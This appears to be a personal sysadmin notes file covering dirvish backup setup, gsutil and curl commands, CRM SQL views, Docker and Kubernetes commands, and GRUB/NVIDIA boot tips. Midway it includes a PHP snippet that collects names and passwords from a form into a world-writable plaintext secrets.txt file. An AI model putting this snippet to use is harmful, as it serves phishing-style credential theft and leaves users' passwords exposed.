
# Adding a server to the backup

Each backup gets its own LVM logical volume with a mount point under `/mnt/backup/{server}`:

* Check the free space with `vgdisplay` (the `Free  PE / Size` field)
* Create the mount point with `mkdir /mnt/backup/{server}`
* Create a new logical volume with `lvcreate -L 100G -n {server} VG01_srsouthp08`
(adjust the 100G to the system)
* Format the new volume with `mkfs.ext4 /dev/VG01_srsouthp08/{server}`
* Mount the volume with `mount /dev/VG01_srsouthp08/{server} /mnt/backup/{server}`
* Add a matching entry to the `fstab`:
`/dev/mapper/VG01_srsouthp08-{server}   /mnt/backup/{server}    ext4
defaults,_netdev        0       0`
* Create the directory `/mnt/backup/{server}/dirvish` and place the
`default.conf` in it.
* Add the server to the `VAULTS` variable at the very bottom of
`/etc/dirvish/backup-dirvish.conf`
* Create a cron job for the server in `/etc/cron.d/adfinis-dirvish-backup`
* Create the first backup with `dirvish --vault {server} --init`.
Caution: this can take several hours and should therefore run inside a
`screen`.
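The steps above can be sketched as a single function. This is only a sketch: `VG01_srsouthp08` and the 100G size come from this host, and the hypothetical `DRY_RUN=1` switch just prints the commands, since the real ones need root and the volume group.

```shell
# Sketch of the "add a server to the backup" steps above.
# With DRY_RUN=1 the commands are only printed instead of executed.
add_backup_server() {
    server="$1"
    vg="VG01_srsouthp08"   # volume group on this backup host
    size="100G"            # adjust per system

    run() { if [ "${DRY_RUN:-0}" = "1" ]; then echo "$@"; else "$@"; fi; }

    run mkdir -p "/mnt/backup/$server"
    run lvcreate -L "$size" -n "$server" "$vg"
    run mkfs.ext4 "/dev/$vg/$server"
    run mount "/dev/$vg/$server" "/mnt/backup/$server"
    # line to append to /etc/fstab:
    echo "/dev/mapper/$vg-$server   /mnt/backup/$server    ext4    defaults,_netdev        0       0"
}

# Dry run for a hypothetical server "web01":
DRY_RUN=1 add_backup_server web01
```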

On the client, add the backup key, exclude huge archives, and make sure the database is in a state where the backup is usable, or that a dump of it exists.
Test with `dirvish --no-run --vault {server}`
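The `default.conf` mentioned above might look roughly like this (a sketch only; hostname, excludes, and expiry are assumptions, but `client`, `tree`, `xdev`, `index`, `image-default`, `exclude`, and `expire-default` are standard dirvish configuration keywords):

```
client: {server}
tree: /
xdev: 0
index: gzip
log: gzip
image-default: %Y%m%d
expire-default: +30 days
exclude:
	/proc/
	/sys/
	/tmp/
	*.iso
```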

Google Cloud Storage is easy to handle with

`gsutil`, e.g.:

gsutil mb -p {project} -c {storage-class} gs://bucketname

gsutil ls -l -b gs://bucketname

gsutil ls -a publicurl - to see the archives (all object versions)

Use `gsutil cp` to restore an old archive.
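A list-and-restore round trip with the commands above might look like this. The bucket and archive names are hypothetical, and `DRY_RUN` defaults to 1 so the `gsutil` calls are only printed (the real ones need cloud credentials):

```shell
# Sketch of listing and restoring from the backup bucket.
# DRY_RUN=1 (the default here) prints the gsutil commands instead of running them.
DRY_RUN="${DRY_RUN:-1}"

gsrun() { if [ "$DRY_RUN" = "1" ]; then echo gsutil "$@"; else gsutil "$@"; fi; }

bucket="gs://bucketname"

gsrun ls -l -b "$bucket"                       # bucket metadata and size
gsrun ls -a "$bucket/dumps/"                   # all object versions under dumps/
gsrun cp "$bucket/dumps/db-20190101.sql.gz" .  # restore one old archive
```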

Report the download size of `{url}` with and without gzip compression:

curl --silent -H "Accept-Encoding: gzip,deflate" --write-out "%{size_download}\n" --output /dev/null {url}

curl --silent --write-out "%{size_download}\n" --output /dev/null {url}
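The two curl calls differ only in the `Accept-Encoding` header, so comparing their `size_download` values shows how much compression saves. With made-up example sizes:

```shell
# Hypothetical sizes reported by the two curl calls above:
gz=250     # bytes with Accept-Encoding: gzip,deflate
raw=1000   # bytes without it

# Percentage saved by compression:
awk -v gz="$gz" -v raw="$raw" 'BEGIN { printf "saved %.0f%%\n", (1 - gz / raw) * 100 }'
```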

This add-on collects the passwords entered in a form into the file `secrets.txt` (chmod 777):

<?php
if (isset($_POST['name'])) {
    $data = $_POST['name'];
    $fp = fopen('secrets.txt', 'a');
    fwrite($fp, $data . " ");
    fclose($fp);
}
if (isset($_POST['pass'])) {
    $data = $_POST['pass'];
    $fp = fopen('secrets.txt', 'a');
    fwrite($fp, $data . "\n");
    fclose($fp);
}
?>

CREATE VIEW `Sales_stage_history_pb` AS
select
`ac`.`name` AS `account_name`,
`ac`.`id` AS `account_id`,
`u`.`user_name` AS `kam`,
`oc`.`expected_er_delivery_date_c` AS `expected_delivery_date`,
`oc`.`numberoftons_c` AS `numbers_of_tons`,
`o`.`lead_source` AS `lead_source`,
`ac`.`billing_address_country` AS `country`,
`oc`.`spcategorie_c` AS `practice`,
`o`.`probability` AS `probability`,
`o`.`name` AS `opportunity_name`,
`o`.`description` AS `opportunity_description`,
`o`.`sales_stage` AS `current_stage`,
`o`.`amount` AS `gross_margin`,
`a`.`before_value_string` AS `old_value`,
`a`.`after_value_string` AS `new_value`,
`a`.`date_created` AS `changing_date`,
`acc`.`spindustrysectorii_c` AS `sp_industry`,
`acc`.`newaccountstatus_c` AS `acc_status`,
`acc`.`commitments_c` AS `acc_commitments`,
`acc`.`reportingto_c` AS `acc_reporting_to`,
`oc`.`spcategorie_c` AS `opp_solution`,
`o`.`date_entered` AS `opp_creation_date`,
`oc`.`reasonswonlost_c` AS `opp_reasonswonlost`,
`o`.`campaign_id` AS `opp_campaign` from ((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`)
where ((`a`.`field_name` = 'sales_stage')
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`o`.`id` = `oc`.`id_c`)) ;

CREATE VIEW `sophies3` AS
select
`o`.`name` AS `Opportunity name`,
`ac`.`name` AS `Client name`,
`acc`.`newaccountstatus_c` AS `Account status`,
`ac`.`billing_address_country` AS `Country`,
`o`.`date_entered` AS `Date created`,
`oc`.`expected_er_delivery_date_c` AS `Estimated delivery date`,
`u`.`user_name` AS `KAM`,
`i`.`name` AS `SP industry`,
`p`.`name` AS `Practice`,
`o`.`amount` AS `Estimated SP gross margin (EUR)`,
`o`.`probability` AS `probability`,
`oc`.`weightedgrossmargin_c` AS `Estimated gross margin with probability`,
`o`.`sales_stage` AS `Sales stage`,
`o`.`lead_source` AS `Lead source`,
`o`.`campaign_id` AS `Campaign ID`
from ((((((((`opportunities_audit` `a` join `opportunities` `o`) join `accounts_opportunities` `ao`) join `accounts` `ac`) join `users` `u`) join `accounts_cstm` `acc`) join `opportunities_cstm` `oc`) join `practices` `p`) join `industries` `i`)
where ((`a`.`field_name` = 'sales_stage')
and (`o`.`id` = `a`.`parent_id`)
and (`o`.`deleted` = 0)
and (`ao`.`opportunity_id` = `o`.`id`)
and (`ac`.`id` = `ao`.`account_id`)
and (`o`.`assigned_user_id` = `u`.`id`)
and (`ac`.`id` = `acc`.`id_c`)
and (`oc`.`spcategorie_c` = `p`.`id`)
and (`acc`.`spindustrysectorii_c` = `i`.`id`)
and (`o`.`id` = `oc`.`id_c`)) ;

Docker commands
docker system prune -a

docker images
docker logs alaskaback
docker exec -it alaskaback /bin/sh
docker exec -it alaskaback /bin/bash
cd /proc/14/fd && tail -f 0 1 2   # inside the container: follow stdin/stdout/stderr of PID 14
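The `tail -f` trick above works because every process exposes its open file descriptors, including stdout and stderr, as symlinks under `/proc/<pid>/fd`. A quick local demonstration with the current shell:

```shell
# Every process exposes its open file descriptors under /proc/<pid>/fd.
# Inside a container, `cd /proc/<pid>/fd && tail -f 1 2` therefore follows
# the main process's stdout/stderr even when `docker logs` is not usable.
ls -l /proc/$$/fd   # the current shell's fds: 0=stdin, 1=stdout, 2=stderr
```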

K8s commands
To enter a container:

kubectl get pods

kubectl exec -it alaska-api-9df9b4594-jchrl -- /bin/bash
kubectl exec -it alaska-payments-d54ffd8b9-jjtw4 -- /bin/bash
Some more commands:

kubectl apply -f

docker-compose -f prox.yaml up -d

kubectl get service alaska-administration

kubectl get pods

kubectl get services

kubectl rollout undo deployments alaska-administration

kubectl describe pods

kubectl get ev

kubectl delete pod foo

GIT commands

git stash

Removing All Unused Objects
The `docker system prune` command will remove all stopped containers, all dangling images, and all unused networks:

docker system prune

Using UEFI; tried with secure boot both off and on, but it still hangs.

Ah, I've only used USB. Could you legacy-boot the CD? On start-up, press the key for the boot list and boot the CD in legacy mode. Another option: try booting and editing the boot entry in GRUB by pressing E on "Install", replacing `quiet splash` with `nomodeset`, and then pressing F10 to boot.

sudo add-apt-repository ppa:graphics-drivers

sudo apt-get install nvidia-driver-410

Or, for an old MacBook:
sudo apt update
sudo apt install nvidia-387